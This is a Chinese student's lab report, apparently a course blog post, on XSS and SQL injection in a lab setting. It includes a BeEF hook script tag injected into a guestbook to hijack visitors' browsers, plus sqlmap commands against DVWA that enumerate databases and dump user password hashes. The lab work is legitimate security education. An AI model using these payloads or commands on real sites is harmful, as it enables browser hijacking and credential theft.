信安第三次实验

实验三 XSS和SQL注入

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

第一个部分:XSS部分:利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。

Xss到底是什么鬼啊!
1、了解什么是XSS:
XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
2、什么是XSS攻击:
XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。如这句简单的Java脚本就能轻易获取用户信息:alert(document.cookie),它会弹出一个包含用户信息的消息框。入侵者运用脚本就能把用户信息发送到他们自己的记录页面中,稍做分析便获取了用户的敏感信息。
3、XSS漏洞的分类
存储型 XSS、反射型XSS。本次实验用到的是存储型XSS

一、实验环境的搭建
首先把实验三文件夹的guestbook导入到win2003虚拟机,然后找到IIS(路径为 开始->程序->管理工具->IIS),找到默认网站,把文件夹给导入进去
在这里插入图片描述这里有一篇参考文献(转载别人博客的)如何配置IIS
还有下载安装我们的扫描软件AWS,具体如何使用安装参考如何安装使用AWS
在配置完我们所有的环境之后,开始实验内容。

一、 利用AWVS扫描留言簿网站,发现其存在XSS漏洞,截图
在这里插入图片描述在这里插入图片描述经过扫描之后,我们发现网站有XSS漏洞,可以注入我们的恶意代码来控制。
打开kali的控制台,打开beef(如果没有的话需要下载,网上有很多教程)。
在这里插入图片描述

二、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板
在这里插入图片描述

<script src="http://ip(kali):3000/hook.js"></script>

留言成功之后我们进面板看看在这里插入图片描述ps:用物理机去访问留言板,因为我们是要测试,所以不能直接用虚拟机访问(这样显得我们太呆
然后进入弹出的beef网站,可以看到物理机访问了我们的留言板,被劫持了。此时我们可以看到一些信息,并使用一些操作
在这里插入图片描述我们可以使被劫持的页面访问校园网站,如图:在这里插入图片描述除此之外,beef页面还有很多操作,详情可以自己去探索0.0

第二个部分SQL注入部分:DVWA+SQLmap+Mysql注入实战

1、什么是SQL注入攻击
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。

2、为何会有SQL注入攻击
很多电子商务应用程序都使用数据库来存储信息。不论是产品信息,账目信息还是其它类型的数据,数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进行不受限的访问。
因为SQL查询经常用来进行验证、授权、订购、打印清单等,所以,允许攻击者任意提交SQL查询请求是非常危险的。通常,攻击者可以不经过授权,使用SQL输入从数据库中获取信息。

实验环境:linux、Metasploitable2。

打开控制台使用nmap找到靶机的ip
在这里插入图片描述然后进入dvwa页面

1、注入点发现。首先肯定是要判断是否有注入漏洞
再操作注入点发现之前,我们得先使安全级别调到低。(方便操作)
在这里插入图片描述随后我们在输入端1、2、3、的输入,然后尝试1’,发现报错了,所以断定里面有SQL注入
漏洞
在这里插入图片描述

下面利用SQLMap进行注入攻击
在此之前我们使用F12查看页面的相关cookies值
在这里插入图片描述实战1:枚举登录MYSQL数据的用户名与密码
在这里插入图片描述结果:得到当前数据库为dawa,使用的用户为root@%

指令(参考):

sqlmap -u “http://192.168.xx.xx/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -b --current-db --current-user

实战2:枚举数据库用户名和密码
在这里插入图片描述指令(参考):

sqlmap -u “http://192.168.xx.xx/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552’ --string=“Surname” --users --password

在这里插入图片描述结果:在下面,需要爆破账号密码。

实战3:枚举数据库和指定数据库的数据表
在这里插入图片描述指令(参考):

sqlmap -u “http://192.168.xx.xx/dvwa/vulnerabilities/sqli/?id=x2&Submit=Submit#” --cookie=‘security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552’ --string=“Surname” --dbs

结果:mysql下所有的数据库
在这里插入图片描述
指令(参考):

sqlmap -u “http://192.168.xx.xx/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552’ --string=“Surname” -D dvwa --tables

结果:dvwa库中,所有的表

实战4:获取指定数据库和表中所有列的信息

在这里插入图片描述
指令(参考):

sqlmap -u “http://192.168.xx.xx/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552’ --string=“Surname” -D dvwa -T users --columns

结果:dvwa库,users表中所有字段信息

实战5:枚举指定数据表中的所有用户名与密码
在这里插入图片描述在这里插入图片描述结果:根据提示爆破,并得出dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中。

指令(参考):

sqlmap -u
“http://192.168.xx.xx/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552’ --string=“Surname” -D dvwa -T users -C user,password --dump

最后,关于sqlmap的语法参数,如下:
• -u :指定目标URL,即注入点
• --cookies:当前会话的cookies值
• -b:获取数据库类型,检索数据库管理系统标识
• --current-db:获取当前数据库
• --current-user:获取当前登录数据库使用的用户
• --users:枚举数据库用户名
• -password:枚举数据库用户的密码(hash)
• --dbs:枚举当前数据库
• -D:指定的数据库
• -T:指定数据库中的数据表
• --columns:获取列的信息
• -C:枚举数据表中的列
• --dump:存储数据表项

在这里插入图片描述在这里插入图片描述第二个图的第二个user多了个s…

总结:对于XSS和SQL注入的了解还不够多,并且对实验的理解程度还不够深,得多看看xss和sql注入的实例,加深印象,使操作更加熟练。继续加油!

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值